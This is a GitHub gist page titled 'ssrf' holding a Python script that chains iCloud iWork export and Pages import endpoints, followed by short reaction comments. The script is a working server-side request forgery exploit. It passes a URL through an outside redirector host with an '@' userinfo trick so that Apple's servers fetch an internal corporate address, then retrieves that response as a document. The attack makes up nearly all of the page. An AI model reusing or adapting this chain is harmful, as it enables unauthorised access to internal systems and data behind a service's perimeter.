Skip to content

Instantly share code, notes, and snippets.

@samwcyo

samwcyo/ssrf Secret

Created Aug 26, 2020
Embed
What would you like to do?
import requests, json
cookies = ''
clientId = ""
dsId = ""
def firstStep(url):
realUrl = "xss.buer.haus/redir.php?url={}".format(url)
r = requests.post("https://p37-iworkexportws.icloud.com/iw/export-ws/10000033657/store_document?build=primary&clientId={}&dsid={}".format(clientId, dsId), data = {
"url": "https://p37-mailws.icloud.com:443@{}".format(realUrl),
"source": "webmail",
"build": "primary"
}, headers = {
"Content-Type": "application/x-www-form-urlencoded; charset=utf-8",
"Origin": "https://www.icloud.com",
"Cookie": cookies
})
# print r.headers
return json.loads(r.text)["job_id"]
def secondStep():
r = requests.get("https://p37-docws.icloud.com/ws/com.apple.Pages/list/lookup_by_id?clientId={}&document_id=documents&dsid={}".format(clientId, dsId), data = {}, headers = {
"Origin": "https://www.icloud.com",
"Cookie": cookies
})
# print "Second: {}".format(r.text)
def thirdStep():
r = requests.get("https://p37-docws.icloud.com/ws/com.apple.Pages/list/list?clientId={}&concise=true&document_id=documents&dsid={}&fetch_manifests=false&skipErrors=true".format(clientId, dsId), data = {}, headers = {
"Origin": "https://www.icloud.com",
"Cookie": cookies
})
# print "Three: {}".format(r.text.encode("utf8"))
def fourthStep(jobId):
r = requests.post("https://p37-iworkexportws.icloud.com/iw/export-ws/{}/store_document_status?build=primary&clientId={}&dsid={}&job_id={}".format(dsId, clientId, dsId, jobId), data = {}, headers = {
"Origin": "https://www.icloud.com",
"Cookie": cookies
})
# print "Four: {}".format(r.text)
def fifthStep(jobId):
r = requests.post("https://p37-iworkexportws.icloud.com/iw/export-ws/{}/move_stored_document?build=primary&clientId={}&dsid={}".format(dsId, clientId, dsId), data = {
"job_id": jobId,
"name": "text_0%202.txt",
"zone": "com.apple.Pages",
"parent_id": "documents",
"package": "N",
"source": "webmail",
"build":"primary"
}, headers = {
"Content-Type": "application/x-www-form-urlencoded; charset=utf-8",
"Origin": "https://www.icloud.com",
"Cookie": cookies
})
# print "Five: {}".format(r.text)
def sixthStep(jobId):
r = requests.post("https://p37-iworkexportws.icloud.com/iw/export-ws/{}/store_document_status?build=primary&clientId={}&dsid={}&job_id={}".format(dsId, clientId, dsId, jobId), data = {}, headers = {
"Content-Type": "text/plain",
"Origin": "https://www.icloud.com",
"Cookie": cookies
})
# print "Six: {}".format(r.text)
return r.text
def seventhStep(pageId):
r = requests.post("https://p37-iwmb.icloud.com/iwmb/pages/import?s=5816&clientId={}&version=1010&clientType=G10.1&clientBuildNumber=10B146".format(clientId), json = {
"document_id": "docws:{}:com.apple.Pages:{}".format(dsId, pageId),
"language":"en-us",
"locale":"en-us",
"timezone":"US/Pacific"
}, headers = {
"Content-Type": "text/plain; charset=utf-8",
"Origin": "https://www.icloud.com",
"Cookie": cookies
})
# print "Seven: {}".format(r.text)
return json.loads(r.text)
def eigthPage(data, pageId):
r = requests.post("https://p37-iwmb.icloud.com/iwmb/pages/create?s=5816&clientId={}&version=1010&clientType=G10.1&clientBuildNumber=10B146".format(clientId), json = {
"parent_item_id":"documents",
"name":"text_0 2.pages",
"bootstrap_source_id": data["bootstrap_source_id"],
"bootstrap_source_token": data["bootstrap_source_token"],
"delete_import_source_auth_token":"null",
"import_source_document_id":"docws:{}:com.apple.Pages:{}".format(dsId, pageId),
"is_import": True,
"is_open_copy": False,
"language":"en-us",
"locale":"en-us",
"timezone":"US/Pacific",
"zone":"com.apple.Pages"
}, headers = {
"Content-Type": "text/plain; charset=utf-8",
"Origin": "https://www.icloud.com",
"Cookie": cookies
})
# print "Eight: {}".format(r.text)
return json.loads(r.text)
def ninthPage(data):
r = requests.get("https://iwmb.icloud.com/iwmb/pages/n{}/manifest?version=1010&clientType=G10.1&clientBuildNumber=10B146".format(data["item_id"]), headers = {
"Origin": "https://www.icloud.com",
"Cookie": cookies
})
# print "Nine: {}".format(r.text)
return json.loads(r.text)
def finalPage(data):
r = requests.get("https://p37-iwres.icloud.com/iwmb/{}fetchDocument?s=5816&version=1010&clientType=G10.1&clientBuildNumber=10B146".format(data["webservices"]["documentPath"]), headers = {
"Origin": "https://www.icloud.com",
"Cookie": cookies
})
return r.text
def find_between( s, first, last ):
try:
start = s.index( first ) + len( first )
end = s.index( last, start )
return s[start:end]
except ValueError:
return ""
def fetchURL(url):
jobId = firstStep(url)
secondStep()
thirdStep()
fourthStep(jobId)
fifthStep(jobId)
while True:
data = sixthStep(jobId)
if "uploading" in data:
continue
pageId = json.loads(data)["result"]["document_id"]
break
data = seventhStep(pageId)
data = eigthPage(data, pageId)
data = ninthPage(data)
out = finalPage(data).encode("utf8")
return out
def clean(content):
content = content.replace("\\n", "\n")
return find_between(content, '<html>', '</html>')
# url = "http://redacted.corp.apple.com:1234/nexus/redacted"
# url = "http://redacted.corp.apple.com:1234/nexus/redacted"
url = "http://redacted.corp.apple.com:1234/nexus/redacted"
print clean(fetchURL(url))
@Luigy-Lemon

This comment has been minimized.

Copy link

@Luigy-Lemon Luigy-Lemon commented Oct 8, 2020

cheese

@ghost

This comment has been minimized.

Copy link

@ghost ghost commented Oct 9, 2020

cheezy

@m0nk3y-s3c

This comment has been minimized.

Copy link

@m0nk3y-s3c m0nk3y-s3c commented Oct 11, 2020

cheeze

@zer0yu

This comment has been minimized.

Copy link

@zer0yu zer0yu commented Oct 12, 2020

cheesy

@spwn3r49sd3r00

This comment has been minimized.

Copy link

@spwn3r49sd3r00 spwn3r49sd3r00 commented Oct 16, 2020

Holy

@starlingvibes

This comment has been minimized.

Copy link

@starlingvibes starlingvibes commented Oct 19, 2020

Holy

@avipars

This comment has been minimized.

Copy link

@avipars avipars commented Mar 14, 2021

ok

@rishabhjainfinal

This comment has been minimized.

Copy link

@rishabhjainfinal rishabhjainfinal commented Jul 16, 2021

🤯

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment